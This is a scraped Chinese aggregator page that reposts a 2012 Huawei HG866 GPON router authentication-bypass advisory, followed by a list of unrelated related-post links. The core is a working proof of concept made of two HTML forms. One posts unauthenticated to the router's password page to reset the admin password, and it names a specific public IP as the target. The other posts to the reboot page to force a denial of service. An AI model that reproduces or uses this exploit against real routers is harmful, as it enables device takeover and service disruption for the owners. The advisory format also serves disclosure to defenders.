Huawei HG866 Authentication Bypass

来源：互联网发布：linux sd卡驱动编辑：程序博客网时间：2024/04/30 09:06
# Exploit Title: Huawei HG866 Authentication Bypass# Date: Jun 14 2012
# Exploit Author: hkm
# Vendor Homepage: http://www.huawei.com
# Version: V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16
# Tested on: HG866GTA_VER.C, 01, 02
# Advisory: http://websec.mx/advisories/view/Evasion_de_autenticacion_en_Huawei_HG866
 
Huawei HG866 GPON routers don't properly validate the session on every page. It is possible to change the web interface admin password by performing an unauthenticated post directly to the form.
 
PoC / Exploit:
 
<!--Changes root password --!>
<form name=hg866bypass action=http://187.162.144.50/html/password.html method=post >
<input name=psw value=password ><input name=reenterpsw value=password >
<input type="submit" name="save" value="Apply" />
</form>
 
<!--Reboots the device --!>
<form name=hg866dos action=http://192.168.100.251/html/admin_reboot.html" method="post">
<input type=submit name=save id=save value=Reboot />
</form>
Huawei HG866 Authentication Bypass
IBM Lotus Domino Authentication Bypass
bypass dll authentication in sygate and such
Multiple Products Cookie Authentication Bypass Vulnerability
Oracle Database Authentication Protocol Security Bypass
AppScan-Authentication Bypass Using HTTP Verb Tampering
Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability
huawei
HUAWEI
huawei
NGS00138 Technical Advisory: Websense Triton 7.6 - authentication bypass in report management UI
一个绝种的漏洞——IIS 5.1 Directory Authentication Bypass
R7-2015-26: Advantech EKI Dropbear Authentication Bypass (CVE-2015-7938)
Authentication
Bypass FsdFilter
Bypass RestoreSystem
bypass ujvc
ByPass UAC
狗日的，我不高兴
ORA-01034:oracle not available
wince下bsp克隆粗谈
Kernel panic - not syncing: Attempted to kill init!
ORA-28002: the password will expire within N days
Huawei HG866 Authentication Bypass
。移动硬盘修复方法
linux配置安装jdk1.7
android全屏，去掉title栏的办法
关于软件的版本
设置ssh超时时间
ActionScript简介
linux中nfs 配置
ASN.1笔记——语法规则与类型概述